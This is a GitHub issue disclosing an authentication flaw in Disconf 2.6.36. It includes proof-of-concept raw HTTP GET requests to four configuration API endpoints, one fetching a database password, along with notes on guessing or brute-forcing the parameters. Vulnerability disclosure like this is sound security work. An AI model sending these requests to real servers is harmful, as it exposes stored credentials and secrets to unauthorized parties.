Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Improper permission management allowing unauthorized users to access sensitive configuration information #431

Open
gaogaostone opened this issue Oct 23, 2024 · 0 comments
Open

Improper permission management allowing unauthorized users to access sensitive configuration information #431

gaogaostone opened this issue Oct 23, 2024 · 0 comments

Comments

@gaogaostone
Copy link

The Disconf of version 2.6.36 has improper permission management, allowing unauthorized users to access sensitive configuration information stored in the configuration center.

Proof on Concept:

1) Access the /api/config/list without authentication to retrieve all the parameters and their values for a particular app in a particular env with particular version.
Send the request as following without cookie or token, and it responses the parameters and their values.
The request is sent with three parameters. The first parameter is app, aka the product name, and it may be guessed and brute-forced. The second parameter is env, and it is fixed in the platform with four values: rd, qa, local and online. The third parameter is version and it can be guessed by naming convention.

GET /api/config/list?app=demo1&env=online&version=1.0 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://x.x.x.x/main.html
image

2) Access the /api/config/simple/list without authentication to retrieve all the parameters for a particular app in a particular env with particular version. This interface only returns the parameter without values.
Send the request as following without cookie or token, and it responses the parameters.
The request is sent with three parameters. The first parameter is app, aka the product name, and it may be guessed and brute-forced. The second parameter is env, and it is fixed in the platform with four values: rd, qa, local and online. The third parameter is version and it can be guessed by naming convention.

GET /api/config/simple/list?app=demo1&env=online&version=1.0 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://x.x.x.x/main.html
image

3) Access the /api/config/item without authentication to retrieve values for a particular app’s particular parameter in a particular env with particular version.
Send the request as following without cookie or token, and it responses the values for a particular parameter.
The request is sent with four parameters. The first parameter is app, aka the product name, and it may be guessed and brute-forced. The second parameter is env, and it is fixed in the platform with four values: rd, qa, local and online. The third parameter is version and it can be guessed by naming convention. The fourth parameter is the key of the parameter and it can be guessed by naming convention.

GET /api/config/item?app=demo1&env=online&version=1.0&key=jdbc.db_0.password HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://x.x.x.x/main.html
image

4) Access the /api/config/file without authentication to retrieve the content of parameter file for a particular app in a particular env with particular version.
Send the request as following without cookie or token, and it responses the content of parameter file.
The request is sent with four parameters. The first parameter is app, aka the product name, and it may be guessed and brute-forced. The second parameter is env, and it is fixed in the platform with four values: rd, qa, local and online. The third parameter is version and it can be guessed by naming convention. The fourth parameter is the parameter file’s name, and it can be guessed by naming convention.

GET /api/config/file?app=demo1&env=online&version=1.0&key=spring-cache.properties HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://x.x.x.x/main.html
image
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@gaogaostone